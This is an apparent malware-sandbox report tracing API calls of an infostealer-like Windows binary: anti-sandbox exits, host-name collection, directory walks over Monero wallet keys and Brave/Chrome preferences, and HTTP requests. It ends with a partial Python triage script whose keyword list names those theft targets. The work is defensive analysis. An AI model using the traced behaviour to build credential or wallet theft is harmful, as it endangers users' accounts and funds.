                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0024578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00245940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00245A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00245A1B
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: c4ab5bb81d1f9b7c8ed272177f17bfeea295fab1308007836ad040a76d2b9b93
                                  • Instruction ID: 5ea3b779899969af011b929d2536d4be9b41f6b7566a5ceee1f02bb03c0f1d4b
                                  • Opcode Fuzzy Hash: c4ab5bb81d1f9b7c8ed272177f17bfeea295fab1308007836ad040a76d2b9b93
                                  • Instruction Fuzzy Hash: 20E1FC72970104ABDB1CFBA0DC97AED7378AB94300F508528B50766192EF346A7DCF96

                                   Control-flow Graph (entry block 2417a0; rendered graph omitted, not recoverable as text)
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 002417C5
                                  • ExitProcess.KERNEL32 ref: 002417D1
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: f0ecb2de45248d920938a278630f70846d367f0ce96d6acdb3d4aef6dc898b24
                                  • Instruction ID: 6abc97ff13a3dcd754dbcefa25736de07402eb5621bedffbca0d7e9bed28c216
                                  • Opcode Fuzzy Hash: f0ecb2de45248d920938a278630f70846d367f0ce96d6acdb3d4aef6dc898b24
                                  • Instruction Fuzzy Hash: EC512BB5B2420AEBDB08DFA0D994ABE77B5FF44704F108058E806A7244D770A9B5CB66

                                   Control-flow Graph (entry block 247500; rendered graph omitted, not recoverable as text)
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00247542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0024757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00247603
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0024760A
                                  • wsprintfA.USER32 ref: 00247640
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\$%
                                  • API String ID: 1544550907-3643170776
                                  • Opcode ID: 546a8c9df6a655f2cd028147a692112ecde2ebd4b948a4609bfc3a64f086dbca
                                  • Instruction ID: 991e5ea4d2a02669079440d21865b993cae5cf26575e831c776193f10308ddad
                                  • Opcode Fuzzy Hash: 546a8c9df6a655f2cd028147a692112ecde2ebd4b948a4609bfc3a64f086dbca
                                  • Instruction Fuzzy Hash: A541A2B1D14248EBDB14DFA4DC45BEEBBB8EF48704F100098F5096B280D774AA94CFA5

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,010416E0), ref: 002498A1
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,010416F8), ref: 002498BA
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,01041500), ref: 002498D2
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,01041710), ref: 002498EA
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,01041728), ref: 00249903
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,010488F8), ref: 0024991B
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,01035048), ref: 00249933
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,01034FA8), ref: 0024994C
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,010415F0), ref: 00249964
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,01041608), ref: 0024997C
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,010417A0), ref: 00249995
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,01041518), ref: 002499AD
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,010351E8), ref: 002499C5
                                    • Part of subcall function 00249860: GetProcAddress.KERNEL32(76210000,01041620), ref: 002499DE
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 002311D0: ExitProcess.KERNEL32 ref: 00231211
                                    • Part of subcall function 00231160: GetSystemInfo.KERNEL32(?), ref: 0023116A
                                    • Part of subcall function 00231160: ExitProcess.KERNEL32 ref: 0023117E
                                    • Part of subcall function 00231110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0023112B
                                    • Part of subcall function 00231110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00231132
                                    • Part of subcall function 00231110: ExitProcess.KERNEL32 ref: 00231143
                                    • Part of subcall function 00231220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0023123E
                                    • Part of subcall function 00231220: ExitProcess.KERNEL32 ref: 00231294
                                    • Part of subcall function 00246770: GetUserDefaultLangID.KERNEL32 ref: 00246774
                                    • Part of subcall function 00231190: ExitProcess.KERNEL32 ref: 002311C6
                                    • Part of subcall function 00247850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002311B7), ref: 00247880
                                    • Part of subcall function 00247850: RtlAllocateHeap.NTDLL(00000000), ref: 00247887
                                    • Part of subcall function 00247850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0024789F
                                    • Part of subcall function 002478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00247910
                                    • Part of subcall function 002478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00247917
                                    • Part of subcall function 002478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0024792F
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,010489C8,?,0025110C,?,00000000,?,00251110,?,00000000,00250AEF), ref: 00246ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00246AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00246AF9
                                  • Sleep.KERNEL32(00001770), ref: 00246B04
                                  • CloseHandle.KERNEL32(?,00000000,?,010489C8,?,0025110C,?,00000000,?,00251110,?,00000000,00250AEF), ref: 00246B1A
                                  • ExitProcess.KERNEL32 ref: 00246B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                   • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2931873225-0
                                  • Opcode ID: af655c440b0705a4ced4a627cbcdf8bd5db4af77e5b7767efd05d1576e3d05d6
                                  • Instruction ID: adf5245d440e981c98a61f8204ebd48f95d75775edff2c2c052db3d354ce9036
                                  • Opcode Fuzzy Hash: af655c440b0705a4ced4a627cbcdf8bd5db4af77e5b7767efd05d1576e3d05d6
                                  • Instruction Fuzzy Hash: 30313C71960208AAEB0CFBF0DC57BEE7778EF44301F004528F616A2182DF706965CEA6

                                   Control-flow Graph
                                   • (graph image not rendered; legend: Executed / Not Executed)
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,010489C8,?,0025110C,?,00000000,?,00251110,?,00000000,00250AEF), ref: 00246ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00246AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00246AF9
                                  • Sleep.KERNEL32(00001770), ref: 00246B04
                                  • CloseHandle.KERNEL32(?,00000000,?,010489C8,?,0025110C,?,00000000,?,00251110,?,00000000,00250AEF), ref: 00246B1A
                                  • ExitProcess.KERNEL32 ref: 00246B22
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 8456a4e18e79cebfec8c5c714d0917f662959655904fbf8700d1df4cf7959ed6
                                  • Instruction ID: f78a78dc200d485bfcd99a50e52a62076f016218b184736029381a8e1d315dcd
                                  • Opcode Fuzzy Hash: 8456a4e18e79cebfec8c5c714d0917f662959655904fbf8700d1df4cf7959ed6
                                  • Instruction Fuzzy Hash: 28F05E7096022AAFE708ABA0DC0EBBD7B74FB05705F104924F517A51C1CBF055A0DE5B

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00234839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00234849
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: b95c12a7d1c28fd1a948e4010befbffc732fd5e597ede89853da9b1b25ed7010
                                  • Instruction ID: a60ce784771e371ceebde1909e64bd69d11670587090c35ff69e34abf52f2ed2
                                  • Opcode Fuzzy Hash: b95c12a7d1c28fd1a948e4010befbffc732fd5e597ede89853da9b1b25ed7010
                                  • Instruction Fuzzy Hash: 58211DB1D00208ABDF14DFA4E946ADD7B79FB45320F108225F965A72D0DB706A19CF92

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 00236280: InternetOpenA.WININET(00250DFE,00000001,00000000,00000000,00000000), ref: 002362E1
                                    • Part of subcall function 00236280: StrCmpCA.SHLWAPI(?,0104FCA0), ref: 00236303
                                    • Part of subcall function 00236280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00236335
                                    • Part of subcall function 00236280: HttpOpenRequestA.WININET(00000000,GET,?,0104F3F8,00000000,00000000,00400100,00000000), ref: 00236385
                                    • Part of subcall function 00236280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002363BF
                                    • Part of subcall function 00236280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002363D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00245228
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: d718c5798aa0358f26b98c7949a65968fece7338de14366666f3f00379755e49
                                  • Instruction ID: b2e38633c4a0558da04a069a0a4f36d3b6664e39f705a05990ddfef4844cd48f
                                  • Opcode Fuzzy Hash: d718c5798aa0358f26b98c7949a65968fece7338de14366666f3f00379755e49
                                  • Instruction Fuzzy Hash: 9E11EC70964148ABEB18FF64DD52AED7378AF50300F804558FC1A5A592EF70AB25CE92

                                   Control-flow Graph
                                   • (graph image not rendered; legend: Executed / Not Executed)
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0023123E
                                  • ExitProcess.KERNEL32 ref: 00231294
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: 15145c1880699906b4e578ed71df75b6e0ef48ecdb5671153f81c5dc14713a32
                                  • Instruction ID: 5ff28b838dcdaca2d9b36f53fd4e2a6d5273bbd117411d55a324995efbcbe4ad
                                  • Opcode Fuzzy Hash: 15145c1880699906b4e578ed71df75b6e0ef48ecdb5671153f81c5dc14713a32
                                  • Instruction Fuzzy Hash: 45016DF0D60318BAEB14EFE0CC49B9EBB78AB04705F208058EB05B62C0D7B495718B99
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00247910
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00247917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0024792F
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: a82f83802ffa7e63a83335535d446ba1c2a8695cc8558afef0502a4c398b9320
                                  • Instruction ID: 311d774491fe1a974f3399549fbc82554c169666d95766247201b56528c9fc34
                                  • Opcode Fuzzy Hash: a82f83802ffa7e63a83335535d446ba1c2a8695cc8558afef0502a4c398b9320
                                  • Instruction Fuzzy Hash: 0E01A9B1A14205EFC704DF94DD45BAEBBB8F744B11F104269FA55E3380D37459548BA2
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0023112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00231132
                                  • ExitProcess.KERNEL32 ref: 00231143
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 77204e57b95509c69902018ffcca165a49ae80065b8f849754408039296cf97c
                                  • Instruction ID: 5007af61fa2fe576da6f463bc2a77f43da1c3ba5d75d21a3d605971baa9e5b73
                                  • Opcode Fuzzy Hash: 77204e57b95509c69902018ffcca165a49ae80065b8f849754408039296cf97c
                                  • Instruction Fuzzy Hash: 3AE0E6B0A55308FBE7146BA09D0AB4D7678AB44B02F104054F70D761D0D6B566619A9E
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 002310B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 002310F7
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 7dd4c0feb362d95909819e6225414769a62ac08833958830920f75594cf34500
                                  • Instruction ID: 79a0272cff400053959155541b0832f5268180fff4ce69642753dfd4753d9ba1
                                  • Opcode Fuzzy Hash: 7dd4c0feb362d95909819e6225414769a62ac08833958830920f75594cf34500
                                  • Instruction Fuzzy Hash: A1F0E2B1641308BBE718AAA4AC49FAEB7E8E705B15F300458F904E7280D5719E50CAA5
                                  APIs
                                    • Part of subcall function 002478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00247910
                                    • Part of subcall function 002478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00247917
                                    • Part of subcall function 002478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0024792F
                                    • Part of subcall function 00247850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002311B7), ref: 00247880
                                    • Part of subcall function 00247850: RtlAllocateHeap.NTDLL(00000000), ref: 00247887
                                    • Part of subcall function 00247850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0024789F
                                  • ExitProcess.KERNEL32 ref: 002311C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: d6405beb64c317fbf0d7cbbbbbffd3f7de1d26d7d4f8f43663d989e68abfa145
                                  • Instruction ID: d32beb3ba99f550f4df538da412f5b4cd9af0dfafee5313921229ca2342d683d
                                  • Opcode Fuzzy Hash: d6405beb64c317fbf0d7cbbbbbffd3f7de1d26d7d4f8f43663d989e68abfa145
                                  • Instruction Fuzzy Hash: 51E012B593430253CA0877B0AC0AB2E329C5B54746F040834FA0DD2102FA65E8709A6A
                                  APIs
                                  • wsprintfA.USER32 ref: 002438CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 002438E3
                                  • lstrcat.KERNEL32(?,?), ref: 00243935
                                  • StrCmpCA.SHLWAPI(?,00250F70), ref: 00243947
                                  • StrCmpCA.SHLWAPI(?,00250F74), ref: 0024395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00243C67
                                  • FindClose.KERNEL32(000000FF), ref: 00243C7C
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: 37521437ffd1dbf8c7a8f33757baca0418628bc60e6dba4decfa83684216d66d
                                  • Instruction ID: 3fc3f56a50b67d3c3f49447b0c01bf07160dd90b818977d9991a9b66effbe399
                                  • Opcode Fuzzy Hash: 37521437ffd1dbf8c7a8f33757baca0418628bc60e6dba4decfa83684216d66d
                                  • Instruction Fuzzy Hash: F3A162B2910219ABDB24EFA4DC85FEE7378BF84301F044598E50D96141EB749BA4CF66
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00250B32,00250B2B,00000000,?,?,?,002513F4,00250B2A), ref: 0023BEF5
                                  • StrCmpCA.SHLWAPI(?,002513F8), ref: 0023BF4D
                                  • StrCmpCA.SHLWAPI(?,002513FC), ref: 0023BF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0023C7BF
                                  • FindClose.KERNEL32(000000FF), ref: 0023C7D1
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  • Opcode ID: 3b6953c5a1df0f8eace2e908bbfba447872add5b29d44592791dd268cbef4cc3
                                  • Instruction ID: e2ecb8e7194dfb4264921f2d41522566101493af9c6c237bcd238be75884bf1e
                                  • Opcode Fuzzy Hash: 3b6953c5a1df0f8eace2e908bbfba447872add5b29d44592791dd268cbef4cc3
                                  • Instruction Fuzzy Hash: DF425872960104ABDB18FB70DD96EED737DAF94300F404568F90AA6181EF349B69CF92
                                  APIs
                                  • wsprintfA.USER32 ref: 0024492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00244943
                                  • StrCmpCA.SHLWAPI(?,00250FDC), ref: 00244971
                                  • StrCmpCA.SHLWAPI(?,00250FE0), ref: 00244987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00244B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00244B92
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: ffe14339c165f91365cf03cbd46833ef183e301c9a45c81bdf525947de20065c
                                  • Instruction ID: 6e602e50e53f30c1f698d385bddc3d9c95ad9eec31a3e41f100ee162cdcd329e
                                  • Opcode Fuzzy Hash: ffe14339c165f91365cf03cbd46833ef183e301c9a45c81bdf525947de20065c
                                  • Instruction Fuzzy Hash: 906144B2910218ABCB24FBA0DC85FEE737CBB88701F044598B50D96141EA71DBA5CF96
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00244580
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00244587
                                  • wsprintfA.USER32 ref: 002445A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 002445BD
                                  • StrCmpCA.SHLWAPI(?,00250FC4), ref: 002445EB
                                  • StrCmpCA.SHLWAPI(?,00250FC8), ref: 00244601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0024468B
                                  • FindClose.KERNEL32(000000FF), ref: 002446A0
                                  • lstrcat.KERNEL32(?,0104FB90), ref: 002446C5
                                  • lstrcat.KERNEL32(?,0104E548), ref: 002446D8
                                  • lstrlen.KERNEL32(?), ref: 002446E5
                                  • lstrlen.KERNEL32(?), ref: 002446F6
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: aa501a5662ce8ed9a7239560eb5cdca95932a177355992f2054c22e77b89ebd5
                                  • Instruction ID: 7b480a78710beadf3cbb3c881b3cb19ffc49f29012ab4f4a53ab951443fde54e
                                  • Opcode Fuzzy Hash: aa501a5662ce8ed9a7239560eb5cdca95932a177355992f2054c22e77b89ebd5
                                  • Instruction Fuzzy Hash: CD5144B2960218ABC724FB70DC89FED737CAB94300F404598F60D96190EB749BA48F96
                                  APIs
                                  • wsprintfA.USER32 ref: 00243EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00243EDA
                                  • StrCmpCA.SHLWAPI(?,00250FAC), ref: 00243F08
                                  • StrCmpCA.SHLWAPI(?,00250FB0), ref: 00243F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0024406C
                                  • FindClose.KERNEL32(000000FF), ref: 00244081
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 32844ca79320324e4b6d99739be1c1b89b91ced6f8da421c654a81828700a0c3
                                  • Instruction ID: f5c051b44f9654d1b1ff7cddab7b59e95e0c9ddaa0d5f15109d110184cb7191e
                                  • Opcode Fuzzy Hash: 32844ca79320324e4b6d99739be1c1b89b91ced6f8da421c654a81828700a0c3
                                  • Instruction Fuzzy Hash: D7514CB2910218ABCB28FBB0DC85EEE737CBB84300F404598B65D96141DB75DBA9CF55
                                  APIs
                                  • wsprintfA.USER32 ref: 0023ED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0023ED55
                                  • StrCmpCA.SHLWAPI(?,00251538), ref: 0023EDAB
                                  • StrCmpCA.SHLWAPI(?,0025153C), ref: 0023EDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0023F2AE
                                  • FindClose.KERNEL32(000000FF), ref: 0023F2C3
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: dad8e95bcdc735bb4d2d0822bb3ca7c7c16f8ebf8acb5b2fb0caa4baf9081db5
                                  • Instruction ID: 87f89895129d6924a3485231518dc07d8f6ffeccf2c70daab5533e328f6c78d5
                                  • Opcode Fuzzy Hash: dad8e95bcdc735bb4d2d0822bb3ca7c7c16f8ebf8acb5b2fb0caa4baf9081db5
                                  • Instruction Fuzzy Hash: 31E1B4729611189AFB58FB60DC52EEE7338EF54300F4145A9B50B62092EF306FAACF55
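The function records above share one shape: wsprintfA builds a "%s\*" or "%s\*.*" search path, FindFirstFileA/FindNextFileA iterate the directory, two StrCmpCA calls skip "." and "..", and the strings pulled in through the lstrcpy/lstrcat helpers name the targets (\Monero\wallet.keys, Brave and Google Chrome Preferences, prefs.js). The script below is an added triage example, not Joe Sandbox's code and not part of this report: it parses the "APIs" and "String ID" bullet lines in the format shown here and labels each record as a directory walk, and as one aimed at browser or wallet artefacts when those names appear. The two sample records are constructed from lines in this report; the regex assumes this listing format, and the SENSITIVE keyword list is an assumption drawn from the strings the report shows.

```python
"""Added example: parse Joe Sandbox "APIs" / "String ID" bullet lines (the format
used in this report) and flag FindFirstFileA/FindNextFileA walks that target
browser-profile or wallet files.  Sample records are constructed from this report."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
STRING_ID_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<strings>.*)$")

# Assumed keyword list: artefact names this report shows being built into paths.
SENSITIVE = ("wallet.keys", "Preferences", "prefs.js", "Brave", "Google Chrome")


@dataclass
class Call:
    api: str
    module: str
    args: list[str]
    ref: str
    subcall: str | None  # callee address when the line is "Part of subcall function XXXXXXXX"


@dataclass
class Record:
    calls: list[Call] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)


def parse_record(text: str) -> Record:
    """Turn one record's bullet lines into Call objects plus its String ID parts."""
    rec = Record()
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            rec.calls.append(Call(m.group("api"), m.group("mod"), args,
                                  m.group("ref").upper(), m.group("sub")))
            continue
        m = STRING_ID_RE.match(line)
        if m:
            # Joe Sandbox joins a function's strings with '$'
            rec.strings.extend(s for s in m.group("strings").split("$") if s)
    return rec


def analyse(rec: Record) -> dict:
    """Heuristics for the enumeration pattern visible in this report's records."""
    own = [c.api for c in rec.calls if c.subcall is None]  # listing order == address order
    walk = dot_skip = False
    if "FindFirstFileA" in own and "FindNextFileA" in own:
        lo, hi = own.index("FindFirstFileA"), own.index("FindNextFileA")
        walk = lo < hi
        # two StrCmpCA calls between the Find* calls: the usual "." / ".." skip
        dot_skip = walk and own[lo:hi].count("StrCmpCA") >= 2
    wildcard = any("\\*" in s for s in rec.strings)  # "%s\*" or "%s\*.*" search pattern
    texts = rec.strings + [a for c in rec.calls for a in c.args]
    targets = sorted({k for k in SENSITIVE if any(k.lower() in t.lower() for t in texts)})
    mutates = any(api in ("CopyFileA", "DeleteFileA") for api in own)
    if walk and targets:
        verdict = "directory walk over browser/wallet artefacts"
    elif walk:
        verdict = "generic directory walk"
    else:
        verdict = "no directory walk"
    return {"walk": walk, "dot_skip": dot_skip, "wildcard": wildcard,
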